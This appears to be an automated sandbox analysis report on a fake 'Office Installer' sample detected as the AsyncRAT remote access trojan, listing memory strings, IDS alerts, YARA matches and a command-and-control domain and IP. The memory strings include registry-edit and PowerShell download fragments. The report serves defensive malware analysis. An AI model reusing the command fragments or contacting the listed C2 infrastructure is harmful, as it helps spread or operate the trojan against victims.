Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru\|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/\|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru\|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/\|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 95.211.208.153:7707 -> 192.168.2.4:49731
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 95.211.208.153:7707 -> 192.168.2.4:49731

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 5512.sytes.net

Yara detected Generic Downloader

Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 95.211.208.153:7707

Source: Joe Sandbox View

ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL

Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153
Source: unknown	TCP traffic detected without corresponding DNS query: 95.211.208.153

Source: powershell.exe, 00000001.00000002.2099977304.00000000089E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppLaunch.exe, 0000000A.00000002.2916185361.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1764715241.000002B401622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://prod.mrodevicemgr.live.com.akadns.net
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2181412356.0000000007047000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2248433326.0000000007907000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1764715241.000002B40161C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com
Source: powershell.exe, 00000008.00000002.2284007759.000002B46B670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305831877.000002B46B740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData
Source: powershell.exe, 00000008.00000002.2317858397.000002B46D5BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseDataEM32
Source: powershell.exe, 00000008.00000002.2322618080.000002B46D630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/c2rreleasedata
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: https://msfree.su/donaties/donations.html
Source: powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
